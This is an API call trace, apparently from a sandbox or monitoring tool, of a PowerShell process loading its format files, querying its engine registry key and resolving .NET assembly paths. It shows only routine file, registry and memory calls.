	[0160.089] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.110] ReadFile (in: hFile=0x320, lpBuffer=0x32fb0ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fb0ea*, lpNumberOfBytesRead=0xbd108*=0x0, lpOverlapped=0x0) returned 1
	[0160.134] ReadFile (in: hFile=0x320, lpBuffer=0x32fbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x32fbba0*, lpNumberOfBytesRead=0xbd108*=0x0, lpOverlapped=0x0) returned 1
	[0160.157] CloseHandle (hObject=0x320) returned 1
	[0160.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xbce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.202] SetErrorMode (uMode=0x1) returned 0x1
	[0160.202] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd0b0 | out: lpFileInformation=0xbd0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.260] SetErrorMode (uMode=0x1) returned 0x1
	[0160.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.261] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd198 | out: phkResult=0xbd198*=0x320) returned 0x0
	[0160.261] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd11c, lpData=0x0, lpcbData=0xbd118*=0x0 | out: lpType=0xbd11c*=0x1, lpData=0x0, lpcbData=0xbd118*=0x56) returned 0x0
	[0160.261] CoTaskMemAlloc (cb=0x5a) returned 0x39a350
	[0160.261] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd0ec, lpData=0x39a350, lpcbData=0xbd0e8*=0x56 | out: lpType=0xbd0ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbd0e8*=0x56) returned 0x0
	[0160.261] CoTaskMemFree (pv=0x39a350) 
	[0160.261] RegCloseKey (hKey=0x320) returned 0x0
	[0160.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.269] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x34969812, Data2=0x358b, Data3=0x4fd4, Data4=([0]=0x89, [1]=0x37, [2]=0x41, [3]=0x35, [4]=0xd4, [5]=0x92, [6]=0x8c, [7]=0x53))) returned 0x0
	[0160.328] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x4d6dbf7f, Data2=0x582e, Data3=0x4f2c, Data4=([0]=0xa4, [1]=0xe3, [2]=0x3b, [3]=0x9e, [4]=0x88, [5]=0x8d, [6]=0xb4, [7]=0xc9))) returned 0x0
	[0160.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.331] SetErrorMode (uMode=0x1) returned 0x1
	[0160.331] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0160.331] GetFileType (hFile=0x320) returned 0x1
	[0160.331] SetErrorMode (uMode=0x1) returned 0x1
	[0160.331] GetFileType (hFile=0x320) returned 0x1
	[0160.331] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.367] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.371] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.375] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.405] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0160.407] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0xfb2, lpOverlapped=0x0) returned 1
	[0160.408] ReadFile (in: hFile=0x320, lpBuffer=0x3325e22, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3325e22*, lpNumberOfBytesRead=0xbd108*=0x0, lpOverlapped=0x0) returned 1
	[0160.408] ReadFile (in: hFile=0x320, lpBuffer=0x3326708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3326708*, lpNumberOfBytesRead=0xbd108*=0x0, lpOverlapped=0x0) returned 1
	[0160.408] CloseHandle (hObject=0x320) returned 1
	[0160.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.545] SetErrorMode (uMode=0x1) returned 0x1
	[0160.545] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd0b0 | out: lpFileInformation=0xbd0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0161.243] SetErrorMode (uMode=0x1) returned 0x1
	[0161.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0161.243] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd198 | out: phkResult=0xbd198*=0x320) returned 0x0
	[0161.244] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd11c, lpData=0x0, lpcbData=0xbd118*=0x0 | out: lpType=0xbd11c*=0x1, lpData=0x0, lpcbData=0xbd118*=0x56) returned 0x0
	[0161.244] CoTaskMemAlloc (cb=0x5a) returned 0x39a2e0
	[0161.244] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd0ec, lpData=0x39a2e0, lpcbData=0xbd0e8*=0x56 | out: lpType=0xbd0ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbd0e8*=0x56) returned 0x0
	[0161.244] CoTaskMemFree (pv=0x39a2e0) 
	[0161.244] RegCloseKey (hKey=0x320) returned 0x0
	[0161.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0161.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0161.246] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xe4464b10, Data2=0x26b3, Data3=0x45af, Data4=([0]=0xbc, [1]=0xaf, [2]=0x73, [3]=0xae, [4]=0x76, [5]=0x82, [6]=0x2f, [7]=0x78))) returned 0x0
	[0161.250] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x234a8ce0, Data2=0x17d3, Data3=0x4af4, Data4=([0]=0xa2, [1]=0xcb, [2]=0xba, [3]=0x4a, [4]=0x1f, [5]=0x59, [6]=0x23, [7]=0x1d))) returned 0x0
	[0161.252] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x7499e74e, Data2=0xcd24, Data3=0x4212, Data4=([0]=0x93, [1]=0x12, [2]=0xb, [3]=0x9d, [4]=0x1f, [5]=0x3f, [6]=0x4b, [7]=0x3a))) returned 0x0
	[0161.252] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0x7e523ec3, Data2=0x846d, Data3=0x4fed, Data4=([0]=0xbe, [1]=0x4d, [2]=0x9c, [3]=0xf0, [4]=0x6, [5]=0x5c, [6]=0x96, [7]=0xa7))) returned 0x0
	[0161.253] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xd6d043a7, Data2=0x923d, Data3=0x4068, Data4=([0]=0xaa, [1]=0xbf, [2]=0x42, [3]=0x53, [4]=0x97, [5]=0xf0, [6]=0x2d, [7]=0x4b))) returned 0x0
	[0161.253] CoCreateGuid (in: pguid=0xbd3c0 | out: pguid=0xbd3c0*(Data1=0xf56b414a, Data2=0x6a44, Data3=0x45c8, Data4=([0]=0x81, [1]=0x95, [2]=0x8e, [3]=0x73, [4]=0x13, [5]=0x9c, [6]=0x0, [7]=0x6b))) returned 0x0
	[0161.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0161.254] SetErrorMode (uMode=0x1) returned 0x1
	[0161.254] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0161.254] GetFileType (hFile=0x320) returned 0x1
	[0161.254] SetErrorMode (uMode=0x1) returned 0x1
	[0161.254] GetFileType (hFile=0x320) returned 0x1
	[0161.255] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0161.255] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0161.256] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0161.256] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0161.257] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0161.258] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x1000, lpOverlapped=0x0) returned 1
	[0161.258] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0xaca, lpOverlapped=0x0) returned 1
	[0161.258] ReadFile (in: hFile=0x320, lpBuffer=0x3371a9a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3371a9a*, lpNumberOfBytesRead=0xbd108*=0x0, lpOverlapped=0x0) returned 1
	[0161.258] ReadFile (in: hFile=0x320, lpBuffer=0x3372468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xbd108, lpOverlapped=0x0 | out: lpBuffer=0x3372468*, lpNumberOfBytesRead=0xbd108*=0x0, lpOverlapped=0x0) returned 1
	[0161.258] CloseHandle (hObject=0x320) returned 1
	[0161.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0161.258] SetErrorMode (uMode=0x1) returned 0x1
	[0161.259] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xbd0b0 | out: lpFileInformation=0xbd0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0161.259] SetErrorMode (uMode=0x1) returned 0x1
	[0161.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0161.259] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xbd198 | out: phkResult=0xbd198*=0x320) returned 0x0
	[0161.259] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd11c, lpData=0x0, lpcbData=0xbd118*=0x0 | out: lpType=0xbd11c*=0x1, lpData=0x0, lpcbData=0xbd118*=0x56) returned 0x0
	[0161.259] CoTaskMemAlloc (cb=0x5a) returned 0x39a2e0
	[0161.259] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xbd0ec, lpData=0x39a2e0, lpcbData=0xbd0e8*=0x56 | out: lpType=0xbd0ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xbd0e8*=0x56) returned 0x0
	[0161.259] CoTaskMemFree (pv=0x39a2e0) 
	[0161.259] RegCloseKey (hKey=0x320) returned 0x0
	[0161.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0161.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xbcc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0161.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0161.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0161.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0161.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0161.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0161.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0161.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0161.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0161.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0161.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0161.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0161.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0161.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0161.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0161.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0164.530] VirtualQuery (in: lpAddress=0xbbc30, lpBuffer=0xbcaf0, dwLength=0x30 | out: lpBuffer=0xbcaf0*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
